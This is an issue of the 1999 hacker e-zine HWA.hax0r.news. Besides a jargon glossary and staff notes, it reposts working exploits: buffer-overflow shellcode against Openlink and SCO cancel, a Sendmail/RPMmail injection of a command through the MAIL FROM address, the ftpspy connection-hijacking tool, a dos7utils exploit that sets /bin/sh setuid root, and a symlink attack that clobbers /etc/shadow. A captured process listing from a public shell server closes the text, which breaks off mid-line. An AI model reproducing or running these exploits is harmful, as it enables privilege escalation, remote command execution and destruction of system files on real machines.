sas2@usa.net .............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black twisted-pair@home.com......: currently active/programming/IRC+ Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sla5h.............................: Croatia N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Wyze1.............................: South Africa Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer Folks from #hwa.hax0r,news Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick kewl sites: + http://blacksun.box.sk. NEW + http://packetstorm.securify.com/ NEW + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up... ============================================================================== 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* *It would appear that the admins at milmail after one year of good use *have decided to blackball my hwa@press.usmc.net address, fuckers. So *please send all mail to cruciphux@dok.org.... thanks and sorry for *the problem. * * * * Cruciphux */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 03.0 Exploit for Openlink's web configurator for Linux/glibc2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hack.co.za/ /* * Exploit for Openlink's web configurator for Linux/glibc2 * use: pipe through netcat to openlink web port (8000 default) * ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000 * makes www_sv execute /usr/bin/wall if you hit the address right * * For informational purposes only. This was written to show that * there's a problem, not for skr1pt k1dd33z --. * don't ask me for help on how to use this to crack systems, * help compiling or anything else. It will only compile on * an x86 compiler however. * * Addresses that work for me: 0xbffffb65 (initial run of the broker) * 0xbffffb85 (all consecutive attempts) * probably tied to process ID www_sv runs as; * first try PIDs were in triple digits, others * 4 digit PIDs. * * If this works, generally no more www_sv processes will be run as * a side effect. * * -Tymm */ #include #include void test() { __asm__(" jmp doit exploit: # code basically from Aleph One's smash stacking article, with # minor mods popl %esi movb $0xd0, %al # Get a / character into %al xorb $0xff, %al movb %al, 0x1(%esi) # drop /s into place movb %al, 0x5(%esi) movb %al, 0x9(%esi) xorl %eax,%eax # clear %eax movb %eax,0xe(%esi) # drop a 0 at end of string movl %eax,0x13(%esi) # drop NULL for environment leal 0x13(%esi),%edx # point %edx to environment movl %esi,0xf(%esi) # drop pointer to argv leal 0xf(%esi),%ecx # point %ecx to argv movl %esi,%ebx # point ebx to command - 1 inc %ebx # fix it to point to the right place movb $0xb,%al # index to execve syscall int $0x80 # execute it xorl %ebx,%ebx # if exec failed, exit nicely... movl %ebx,%eax inc %eax int $0x80 doit: call exploit .string \"..usr.bin.wall.\" "); } char *shellcode = ((char *)test) + 3; char code[1000]; int main(int argc, char *argv[]) { int i; int left; unsigned char where[] = {"\0\0\0\0\0"} ; int *here; char *dummy; long addr; if (argc > 1) addr = strtoul(argv[1], &dummy, 0); else addr = 0xbffffb85; fprintf(stderr, "Setting address to %8x\n", addr); *((long *)where) = addr; strcpy(code, shellcode); for (i = 0; i < 64; i++) { strcat(code, where); } printf("GET %s\n", code); exit(0); } @HWA* 04.0 sco_cancel.c yields egid=18(lp) Tested on SCO 5.0.5+Skunkware98 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hack.co.za/ /** *** sco_cancel.c yields egid=18(lp) *** Tested on SCO 5.0.5+Skunkware98 *** *** Compile gcc -o sco_cancelx.c sco_cancelx.c *** *** Brock Tellier btellier@usa.net *** **/ #include #include char scoshell[]= /* doble@iname.com */ "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; #define LEN 1500 #define NOP 0x90 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } int main(int argc, char *argv[]) { long int offset=0; int i; int buflen = LEN; long int addr; char buf[LEN]; if(argc > 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc == 2){ offset=atoi(argv[1]); } else if (argc == 3) { offset=atoi(argv[1]); buflen=atoi(argv[2]); } else { offset=600; buflen=1200; } addr=get_sp(); fprintf(stderr, "\nSCO 5.0.5 cancel exploit yields egid=18(lp)\n"); fprintf(stderr, "Brock Tellier btellier@webley.com\n\n"); fprintf(stderr, "Using addr: 0x%x\n", addr+offset); memset(buf,NOP,buflen); memcpy(buf+(buflen/2),scoshell,strlen(scoshell)); for(i=((buflen/2) + strlen(scoshell))+1;i ... Sender Okay RCPT TO: rpmmail 250 ... Recipient Okay data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit Sendmail 8.9.3 + RPMmail [nhaniff@dhcp-160-190 nhaniff]$ telnet (host) 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 dhcp-160-190.x.x ESMTP Sendmail 8.9.3/8.9.3; Wed, 6 Oct 1999 helo x.x 250 dhcp-160-190.x.x Hello IDENT:nhaniff@localhost [127.0.0.1], pleased to meet you MAIL FROM: ;/command/to/execute;@microsoft.com 250 <;/command/to/execute;@microsoft.com> ... Sender Okay RCPT TO: rpmmail 250 ... Recipient Okay data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit @HWA 06.0 ftpspy, ftp exploit ~~~~~~~~~~~~~~~~~~~ From http://www.hack.co.za/ /* ftpspy.c This program is written to show vulnerability of some FTP servers then establish passive ftp connection. You MAY use this program or any part of it to test your ftp server for this vylnerability. You MUST NOT use this program or any part of it against another FTP server. The program distributed "AS IS" without any guarantees. This program uses the fact, that most TCP/IP stacks allocates TCP ports for applications one-by-one. Program creates FTP connection to FTPPORT of attacked machine, logs in as USER with PASS and then every RETRYDELAY seconds sends PASV command to server to find which TCP port is used now by server. After port is discovered program bombs next NTHREAD ports starting from found port + OFFSET with "connect" requests. Vuln: FreeBSD 2.2.1-2.2.5 (c) 1999 3APA3A aka Wise Tomcat Please send all your comments to wise@tomcat.ru /\_/\ { . . } |\ +--oQQo->{ ^ }<-----+ \ | 3APA3A U 3APA3A } +-------------o66o--+ / |/ */ #include #include #include #include #include #include #include #include #include #include #define DEBUGLEVEL 1 #define USER "USER ftp\012" #define PASS "PASS root@\012" #define PASV "PASV\012" #define NTHREADS 3 #define RETRYDELAY 10 #define FTPPORT 21 #define OFFSET 1 #define TIMEOUT 5 int gotit=0; char buf[4100]; long size; int port; char * text = "All my loving I will send to you\r\012All my loving, darling I'll be true\r\012 rw-r--r-- 1 1012 5 406 Aug 08 10:08 loving\r\012" ; void usage( char* progname) { fprintf(stderr, "Usage: %s ipaddr", progname); exit(1); } void getsignal(int sig){ if(!gotit){ #if DEBUGLEVEL > 2 fprintf(stderr, "Port %d killed\n", port); #endif exit(0); /* Papa asks me to shutdown! */ } } jmp_buf env; int needalarm=0; void br(int sig){ if(needalarm) longjmp(env,1); } /* Read FTP SERVER replies while they begins '###-'. Last line looks like '### '. */ void getftpdata(int sock){ char * newl; while( (size = read(sock, buf, 1024)) > 0 ){ #if DEBUGLEVEL > 1 write(2, "<<", 2); write(2, buf, size); #endif if( size > 0 ) buf[size] = 0; for( newl=buf; newl && ((newl-buf) < (size-3)); newl = strchr(newl, '\012') ) if(newl[3] != '-' && isdigit(newl[1]) ) return; } } /* write command to FTP SERVER*/ void writeftpdata(int sock, char* data){ write(sock, data, strlen(data)); #if DEBUGLEVEL > 1 write(2, ">>", 2); write(2, data, strlen(data)); #endif } int main(int argc, char* argv[]){ struct sockaddr_in sin; int ftpsock, sock; char addr[16]; int i; int code, a1, a2, a3, a4, p1, p2; pid_t children[NTHREADS]; pid_t child; if(argc!=2) usage(argv[0]); sin.sin_addr.s_addr = inet_addr(argv[1]); sin.sin_family = AF_INET; sin.sin_port = htons(FTPPORT); if ((ftpsock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ fprintf(stderr, "Error: Unable to allocate socket\n"); return -1; } /* connect to FTPPORT of FTP SERVER */ if( connect(ftpsock, (struct sockaddr*)&sin,sizeof(sin)) == -1 ){ fprintf(stderr, "Unable to connect %s:%d\n", argv[1], FTPPORT); return -2; } /* now log in as USER with PASS */ getftpdata(ftpsock); writeftpdata(ftpsock, USER); getftpdata(ftpsock); writeftpdata(ftpsock, PASS); getftpdata(ftpsock); #if DEBUGLEVEL > 0 fprintf(stderr, "Logged on\n"); #endif for(;;){ /* every RETRYDELAY seconds we send PASV command to FTP SERVER in order to have fresh inforamation about ports it listens */ writeftpdata(ftpsock, PASV); getftpdata(ftpsock); sscanf(buf, "%d Entering Passive Mode (%d,%d,%d,%d,%d,%d)", &code, &a1, &a2, &a3, &a4, &p1, &p2); if( code < 200 || code > 300 ){ fprintf(stderr, "Unable to enter PASV mode: %d\n", code); return -3; } sprintf(addr, "%d.%d.%d.%d", a1, a2, a3, a4); port = p1 * 256 + p2; /* FTP SERVER allocated this port for us */ #if DEBUGLEVEL > 2 fprintf(stderr, "Got port %d\n", port); #endif sin.sin_addr.s_addr = inet_addr(addr); #if DEBUGLEVEL > 2 fprintf(stderr, "Monitor: %s %d-%d\n", addr, port + 1, port + NTHREADS + OFFSET - 1); /* We will mpnitor this port range */ #endif /* now lets fork() with NTHREADS - one thfread for each port that will be bombed */ for( i=0; (i < NTHREADS) && (child = fork()); i++ ) children[i] = child; if(child){ /* Lucky PAPA */ #if DEBUGLEVEL > 2 fprintf(stderr, "%i threads started\n", i); #endif /* It's good time to sleep little bit and then to kill all this noisi children */ sleep(RETRYDELAY); for( i=0; i 2 fprintf(stderr, "Monitor port %d started\n", port); #endif signal(SIGUSR1, getsignal); signal(SIGALRM, br); sin.sin_port = htons(port); for(;;){ /* Lets bomb the port! */ if( (sock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ printf("Error: Unable to allocate socket\n"); return -1; } if( connect(sock, (struct sockaddr*)&sin,sizeof(sin)) != -1 ) break; close(sock); } gotit = 1; /* We did it!!! */ printf("Got it!!!! Port:%d\n", port); if(!setjmp(env)){ needalarm=1; alarm(TIMEOUT); while( (size = read(sock, buf, 4096)) > 0 ) { needalarm = 0; write (1, buf, size); } } else { writeftpdata(sock, text); } close(sock); return 0; } } return 0; } @HWA 07.0 A vulnerability exists in the /usr/lib/merge/dos7utils program... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hack.co.za/ #!/bin/sh # # A vulnerability exists in the /usr/lib/merge/dos7utils # program (suid root by default) which allows any user # to execute any command as root. # # The dos7utils program gets its localeset.sh exec path # from the environment variable STATICMERGE. By setting # this to a directory writable by us and setting the -f # switch, we can have dos7utils run our program as follows: # # ..Brock Tellier uname -a; id; pwd export STATICMERGE=/tmp cat > /tmp/localeset.sh << 'EOF' #!/bin/sh id chmod +s /bin/sh EOF chmod 700 /tmp/localeset.sh ./dos7utils -f bah /bin/sh # www.hack.co.za # @HWA 08.0 SCO OpenServer symlink vulnerability (Brock Tellier) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.hack.co.za/ #!/bin/sh # # Under certain versions of SCO OpenServer there exists a # symlink vulnerability which can be exploited to overwrite # any file which is group writable by the 'auth' group. # # The problem in particular is in the the # /etc/sysadm.d/bin/userOsa executable. When given garbage # output the program will write out a debug log. However, # the program does not check to see if it overwriting a # currently existing file nor wether it is following a # symlink. Therefore is it possible to overwrite files with # debug data which are both in the 'auth' group and are # writable by the same group. Both /etc/shadow & /etc/passwd # fall into this category. If such an attack were launched # against these files the system would be rendered unusable. # # ..Brock Tellier # # vulnerable: SCO Open Server 5.0 -> 5.0.5 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # cd /tmp ln -s /etc/shadow.old debug.log /etc/sysadm.d/bin/userOsa # www.hack.co.za # @HWA 09.0 GREX cyberspace.org - Free shell access ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Free shell (restricted) no telnet/ftp unless you contribute, system is setup similar to a bbs but you do get a shell. Telnet to cyberspace.org. And you get this, heres a brief look see at the system; Grex central timekeeping. At the beep, the time is 6:20PM on Tuesday, 19 October 1999 New to grex? Type help at the login prompt (ttys3) grex login: ccc ccc's Password: Thanks to the Ann Arbor Observer for the long-running Grex ad on arborweb.com. Happy Birthday to Jishnu Nair (atticus's baby)! Last login: Tue Oct 19 18:13:31 on ttyu8 from 24.x.x.x No mail. Type 'bbs' to see what Grex is all about! Type 'change' to change your settings. Type 'faq' to see answers to frequently asked questions. > ls -laFF total 10 drwxr-xr-x 2 ccc populus 512 Oct 19 18:14 ./ drwxr-xr-x 16 root wheel 512 Oct 19 18:13 ../ -rw-r--r-- 1 ccc populus 1159 Oct 19 18:15 .agora31.cf -rw-r--r-- 1 ccc populus 778 Oct 19 18:13 .cfonce -rw-r--r-- 1 ccc populus 664 Oct 19 18:13 .cshrc -rw-r--r-- 1 ccc populus 718 Oct 19 18:13 .login -rw-r--r-- 1 ccc populus 1245 Oct 19 18:13 .mailrc -rw------- 1 ccc populus 360 Oct 19 18:13 .plan > ps -aux USER PID %CPU %MEM SZ RSS TT STAT START TIME COMMAND ccc 13349 76.8 0.2 296 528 s3 R 18:21 0:03 ps -aux mikeaa 13347 30.8 0.1 36 264 t1 S 18:21 0:00 /usr/local/lib/gcc-lib/s root 13353 24.3 0.2 288 460 ? S 18:21 0:00 sendmail: SAA13353 major mikeaa 13341 8.7 0.1 44 252 t1 S 18:21 0:00 /usr/local/bin/gcc.real root 152 8.3 0.0 12 8 ? S Oct 10521:55 update root 13352 3.9 0.1 120 264 t7 S 18:21 0:00 login -h 208.135.167.19 root 7712 0.6 0.0 56 60 ? S 17:39 0:05 telnetd ttyq3 207.91.203 ccc 13228 0.5 0.3 264 732 s3 S 18:20 0:02 -tcsh (tcsh) root 13148 0.4 0.2 56 440 ? S 18:20 0:02 telnetd ttyt7 208.135.16 root 91 0.0 0.1 60 168 ? S Oct 10174:57 syslogd root 98 0.0 0.0 240 88 ? S Oct 10 32:13 sendmail: accepting conn root 112 0.0 0.0 136 0 ? IW< Oct 10 46:40 /usr/local/sbin/robocop root 102 0.0 0.0 60 0 ? IW Oct 10 0:01 rpc.statd daemon 62 0.0 0.0 56 112 ? S Oct 10 17:50 /usr/local/libexec/portm root 11493 0.0 0.0 56 0 ? IW 18:10 0:02 telnetd ttyua 139.92.170 root 10374 0.0 0.0 56 60 ? S 18:02 0:19 telnetd ttyu1 204.212.46 root 111 0.0 0.0 100 0 ? IW Oct 10103:12 /usr/local/sbin/idled root 113 0.0 0.0 24 0 ? IW Oct 10 0:00 /bin/sh /usr/local/Hughe root 105 0.0 0.2 140 448 ? S Oct 10 13:12 /usr/local/libexec/httpd hrcfan 11774 0.0 0.0 264 0 t2 IW 12:03 0:02 -tcsh (tcsh) root 13257 0.0 0.2 316 560 ? S 18:20 0:00 sendmail: SAA13245 tilma root 1439 0.0 0.0 40 0 co IW Oct 14 0:00 - std.9600 console (gett root 12376 0.0 0.2 56 436 ? S 18:16 0:08 telnetd ttyr0 204.212.46 cfadm 11371 0.0 0.0 96 0 q8 IW 18:09 0:02 /usr/local/bin/bbs msql 127 0.0 0.0 140 0 ? IW Oct 10276:15 /usr/local/Hughes/bin/ms root 3932 0.0 0.0 56 0 ? IW 17:12 0:07 telnetd ttyr9 148.233.86 janko 6567 0.0 0.2 144 504 r1 S 17:31 0:03 -bash (bash) root 12330 0.0 0.0 252 0 ? IW 18:16 0:00 sendmail: server webpers root 84 0.0 5.01223212424 ? S Oct 10251:18 /usr/local/libexec/named richard 10202 0.0 0.0 36 56 pe S 18:01 0:00 watch ... root 71 0.0 0.0 36 52 ? S Oct 10 4:22 in.routed msql 126 0.0 0.0 52 0 ? IW Oct 10 0:00 /bin/csh -c /usr/local/H cfadm 2686 0.0 0.0 128 0 pe IW 17:02 0:06 /usr/local/bin/bbs root 11820 0.0 0.0 240 0 ? IW 18:12 0:05 /usr/local/libexec/sshd ryan 12429 0.0 0.0 160 0 q5 IW 18:16 0:00 tcsh -c /a/r/y/ryan/pfil thea 10449 0.0 0.1 1264 300 u1 S 18:02 0:18 pine root 164 0.0 0.1 52 168 ? S Oct 10 8:06 cron root 219 0.0 0.0 40 0 b IW Oct 10 0:00 - std.9600 ttyb (getty) suchit 360 0.0 0.0 152 0 pa IW 16:43 0:07 -bash (bash) fb2 13125 0.0 0.0 36 0 ua IW 18:20 0:00 /bin/sh /b root 29495 0.0 0.0 40 0 ? IW 06:01 0:00 in.ntalkd nobody 10684 0.0 0.3 216 628 ? S 18:04 0:09 /usr/local/libexec/httpd root 2 0.0 0.0 0 0 ? D Oct 10 1:06 pagedaemon root 12583 0.0 0.2 328 524 ? S 18:17 0:02 sendmail: RAA04763 serve mystar 28951 0.0 0.0 68 0 tf IW 16:31 0:02 -csh (csh) joe 13260 0.0 0.1 48 128 t8 S 18:20 0:00 /bin/sh /usr/local/bin/m root 1 0.0 0.0 52 20 ? S Oct 10 5:23 /sbin/init - root 11752 0.0 0.0 56 0 ? IW 12:03 0:17 telnetd ttyt2 130.126.16 mbollman 11691 0.0 0.0 72 0 p7 IW 18:12 0:01 -ksh (ksh) skymoon 10789 0.0 0.0 68 0 s8 IW 18:04 0:02 -csh (csh) root 2089 0.0 0.0 56 0 ? IW 16:59 0:34 telnetd ttyu9 164.76.51. metgod 11225 0.0 0.0 68 0 t9 IW 18:07 0:01 ksh mikeaa 13340 0.0 0.0 72 112 t1 S 18:21 0:00 /bin/sh ./configure ya 10199 0.0 0.0 68 0 tc IW 18:01 0:02 -csh (csh) hrcfan 11415 0.0 0.0 184 0 t2 IW 18:09 0:01 elm root 10939 0.0 0.0 56 56 ? S 18:05 0:09 telnetd ttyqd 198.182.64 party 11972 0.0 0.1 72 328 t3 S 18:14 0:02 /usr/local/bin/party_ root 28089 0.0 0.0 56 0 ? IW 16:25 0:03 telnetd ttyte gate1.lci. jiffer 26209 0.0 0.0 264 0 r3 IW 16:12 0:02 -tcsh (tcsh) jackal 10326 0.0 0.0 48 0 rc TW 18:01 0:00 /bin/sh /usr/local/bin/m root 13199 0.0 0.2 56 436 ? S 18:20 0:01 telnetd ttyt8 152.207.13 root 28934 0.0 0.0 56 60 ? S 16:31 0:13 telnetd ttytf 207.220.20 meme 9643 0.0 0.0 68 0 tb IW 17:56 0:01 -csh (csh) nats 7089 0.0 0.0 172 0 q7 IW 17:35 0:01 elm root 10914 0.0 0.0 56 60 ? S 18:05 0:06 telnetd ttypc 207.91.203 root 13344 0.0 0.1 252 280 ? S 18:21 0:00 sendmail: server tfabbs. root 11314 0.0 0.0 56 0 ? IW 18:08 0:02 telnetd ttys4 24.48.58.2 jackal 12828 0.0 0.0 36 0 rc TW 18:18 0:00 more -d root 10542 0.0 0.0 56 0 ? IW 18:03 0:03 telnetd ttyq2 204.212.46 root 7495 0.0 0.0 24 0 ? IW Oct 11 1:14 ./mdaemon -d root 11216 0.0 0.0 56 0 ? IW 18:07 0:01 telnetd ttyt9 216.101.22 archer 4089 0.0 0.0 48 0 r9 IW 17:13 0:00 /bin/sh /usr/local/bin/m root 11466 0.0 0.0 96 0 ? IW Oct 16 0:01 egrep USER|STOR|RETR|LIS root 22696 0.0 0.0 56 0 ? IW Oct 14 1:35 telnetd ttyu5 141.211.16 root 11113 0.0 0.0 56 0 ? IW 18:06 0:02 telnetd ttys0 198.108.22 root 12296 0.0 0.0 56 60 ? S 18:16 0:02 telnetd ttyq5 4.17.192.3 robnoiz 11194 0.0 0.0 316 0 s0 IW 18:07 0:01 pine sekharg 10067 0.0 0.0 68 0 qb IW 17:59 0:01 -csh (csh) pfv 10343 0.0 0.0 36 56 u2 S 18:01 0:00 watch ... prime 11619 0.0 0.0 56 0 pc IW 18:11 0:01 -csh (csh) jazz 131 0.0 0.0 232 0 r2 IW 16:40 0:01 -tcsh (tcsh) pizo56 13130 0.0 0.2 800 516 ? S 18:20 0:02 ftpd: quincy-ip-15-99.dy root 9885 0.0 0.0 56 60 ? S 17:58 0:06 telnetd ttysa 198.182.64 root 13275 0.0 0.2 300 388 ? I 18:20 0:00 sendmail: SAA13263 f298. bebbe346 10528 0.0 0.0 48 0 t4 TW 18:02 0:00 mail pine nobody 11637 0.0 0.3 216 644 ? S 18:11 0:04 /usr/local/libexec/httpd party 8477 0.0 0.1 72 328 t5 S 17:45 0:04 /usr/local/bin/party_ root 11465 0.0 0.1 36 140 ? S Oct 16 14:41 tail -f /var/log/ftp.log wild 10942 0.0 0.0 40 0 qd IW 18:05 0:00 /bin/sh /b coop 16853 0.0 0.0 156 0 p4 IW Oct 17 0:01 -bash (bash) saloon 10241 0.0 0.0 148 0 u0 IW 18:01 0:06 -bash (bash) root 2308 0.0 0.0 56 0 ? IW Oct 18 0:03 telnetd ttyp6 206.189.24 root 14496 0.0 0.1 28 180 ? S 12:25 0:12 in.comsat root 11920 0.0 0.0 56 60 ? S 18:13 0:05 telnetd ttyt3 204.212.46 root 9629 0.0 0.0 56 60 ? S 17:55 0:16 telnetd ttytb 171.64.15. senna 29517 0.0 0.0 36 0 ue IW 16:36 0:02 watch ... root 6538 0.0 0.0 56 60 ? S 17:31 0:07 telnetd ttyr1 158.193.82 cfadm 11132 0.0 0.0 96 0 s0 IW 18:07 0:01 /usr/local/bin/bbs cfadm 11978 0.0 0.0 128 0 u5 IW Oct 17 0:51 bbs staff wild 10963 0.0 0.0 48 0 qd IW 18:06 0:00 /bin/sh /usr/local/bin/m jackal 13021 0.0 0.0 40 0 rc IW 18:19 0:00 /bin/sh /usr/local/lib/m wasf 12094 0.0 0.0 68 0 q6 IW 18:15 0:01 -csh (csh) archer 3951 0.0 0.0 68 0 r9 IW 17:12 0:01 -csh (csh) root 12506 0.0 0.0 56 0 ? IW 18:17 0:02 telnetd ttyu8 198.133.22 jackal 13077 0.0 0.1 36 200 rc S 18:19 0:01 more -d root 10170 0.0 0.0 56 0 ? IW 18:00 0:04 telnetd ttytc 163.121.88 meme 9670 0.0 0.2 680 388 tb S 17:56 0:13 pine senna 29426 0.0 0.0 68 0 ue IW 16:35 0:01 -csh (csh) pfv 10305 0.0 0.0 260 0 u2 IW 18:01 0:02 -tcsh (tcsh) somesh 11383 0.0 0.0 380 0 s4 IW 18:09 0:01 lynx -cookies quote.yaho root 11906 0.0 0.0 56 0 ? IW 18:13 0:05 telnetd ttysb 63.23.174. somesh 11322 0.0 0.0 264 0 s4 